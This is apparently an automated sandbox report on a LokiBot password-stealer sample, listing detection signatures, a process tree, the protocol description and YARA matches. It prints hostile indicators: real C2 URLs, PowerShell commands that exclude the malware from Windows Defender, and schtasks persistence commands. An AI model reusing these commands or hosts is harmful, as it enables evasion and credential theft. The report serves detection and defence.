Edit tour

Windows Analysis Report
CLOSURE DATE FOR THE YEAR.exe

Overview

General Information

Sample name:	CLOSURE DATE FOR THE YEAR.exe
Analysis ID:	1568026
MD5:	17bf29a93776b4f6be948802f652e6a9
SHA1:	3e4727a68d9a4ee3dc3af79408d60916777c1546
SHA256:	527a3bc0b6281d3e65cb6b19801b1a9d748d5ac773fcb4655edc783534450816
Tags:	exeLokiuser-abuse_ch
Infos:

Detection

Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Lokibot

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Yara detected aPLib compressed binary

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

CLOSURE DATE FOR THE YEAR.exe (PID: 7480 cmdline: "C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe" MD5: 17BF29A93776B4F6BE948802F652E6A9)

powershell.exe (PID: 7732 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7792 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 8092 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 7852 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IOsbBBIDAm" /XML "C:\Users\user\AppData\Local\Temp\tmpB774.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 7996 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

IOsbBBIDAm.exe (PID: 8056 cmdline: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe MD5: 17BF29A93776B4F6BE948802F652E6A9)

schtasks.exe (PID: 7268 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IOsbBBIDAm" /XML "C:\Users\user\AppData\Local\Temp\tmpDA2F.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WerFault.exe (PID: 2132 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8056 -s 1768 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "94.156.177.41/kings/five/fre.php"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1755400023.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1755400023.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1755400023.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1755400023.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x17450:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1755400023.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x481b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1755400023.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x1305f:$des3: 68 03 66 00 00 0x17450:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x1751c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.1755400023.0000000003FD3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1755400023.0000000003FD3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1755400023.0000000003FD3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1755400023.0000000003FD3000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x17470:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1755400023.0000000003FD3000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x483b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1755400023.0000000003FD3000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x1307f:$des3: 68 03 66 00 00 0x17470:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x1753c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000009.00000002.2068531815.000000000402B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000009.00000002.2068531815.000000000402B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000009.00000002.2068531815.000000000402B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.2068531815.000000000402B000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x181b0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000009.00000002.2068531815.000000000402B000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x557b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000009.00000002.2068531815.000000000402B000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13dbf:$des3: 68 03 66 00 00 0x181b0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x1827c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000009.00000002.2068531815.0000000004011000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000009.00000002.2068531815.0000000004011000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000009.00000002.2068531815.0000000004011000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.2068531815.0000000004011000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x18190:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000009.00000002.2068531815.0000000004011000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x555b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000009.00000002.2068531815.0000000004011000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13d9f:$des3: 68 03 66 00 00 0x18190:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x1825c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000008.00000002.2903142728.0000000001258000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
00000000.00000002.1754216796.00000000028D6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1754216796.00000000028D6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1754216796.00000000028D6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1754216796.00000000028D6000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x24674:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1754216796.00000000028D6000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x11a27:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1754216796.00000000028D6000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x2026b:$des3: 68 03 66 00 00 0x24674:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x24740:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Process Memory Space: CLOSURE DATE FOR THE YEAR.exe PID: 7480	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: CLOSURE DATE FOR THE YEAR.exe PID: 7480	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: CLOSURE DATE FOR THE YEAR.exe PID: 7480	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: CLOSURE DATE FOR THE YEAR.exe PID: 7480	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x5276:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0xa6bf:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x7dfd0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: RegSvcs.exe PID: 7996	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: RegSvcs.exe PID: 7996	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: RegSvcs.exe PID: 7996	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: RegSvcs.exe PID: 7996	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0xd32b:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: IOsbBBIDAm.exe PID: 8056	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: IOsbBBIDAm.exe PID: 8056	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: IOsbBBIDAm.exe PID: 8056	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x2bb2c:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x36753:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 45 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.2.IOsbBBIDAm.exe.402bdc0.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
9.2.IOsbBBIDAm.exe.402bdc0.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
9.2.IOsbBBIDAm.exe.402bdc0.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.IOsbBBIDAm.exe.402bdc0.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
9.2.IOsbBBIDAm.exe.402bdc0.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
9.2.IOsbBBIDAm.exe.402bdc0.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
9.2.IOsbBBIDAm.exe.402bdc0.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
9.2.IOsbBBIDAm.exe.402bdc0.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
9.2.IOsbBBIDAm.exe.4011da0.2.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
9.2.IOsbBBIDAm.exe.4011da0.2.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
9.2.IOsbBBIDAm.exe.4011da0.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.IOsbBBIDAm.exe.4011da0.2.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
9.2.IOsbBBIDAm.exe.4011da0.2.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
9.2.IOsbBBIDAm.exe.4011da0.2.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
9.2.IOsbBBIDAm.exe.4011da0.2.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
9.2.IOsbBBIDAm.exe.4011da0.2.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
9.2.IOsbBBIDAm.exe.402bdc0.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
9.2.IOsbBBIDAm.exe.402bdc0.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
9.2.IOsbBBIDAm.exe.402bdc0.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
9.2.IOsbBBIDAm.exe.402bdc0.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
9.2.IOsbBBIDAm.exe.402bdc0.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
9.2.IOsbBBIDAm.exe.4011da0.2.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
9.2.IOsbBBIDAm.exe.4011da0.2.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
9.2.IOsbBBIDAm.exe.4011da0.2.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
9.2.IOsbBBIDAm.exe.4011da0.2.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
9.2.IOsbBBIDAm.exe.4011da0.2.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
8.2.RegSvcs.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
8.2.RegSvcs.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
8.2.RegSvcs.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.RegSvcs.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
8.2.RegSvcs.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
8.2.RegSvcs.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
8.2.RegSvcs.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
8.2.RegSvcs.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
8.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
8.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
8.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.RegSvcs.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
8.2.RegSvcs.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
8.2.RegSvcs.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
8.2.RegSvcs.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
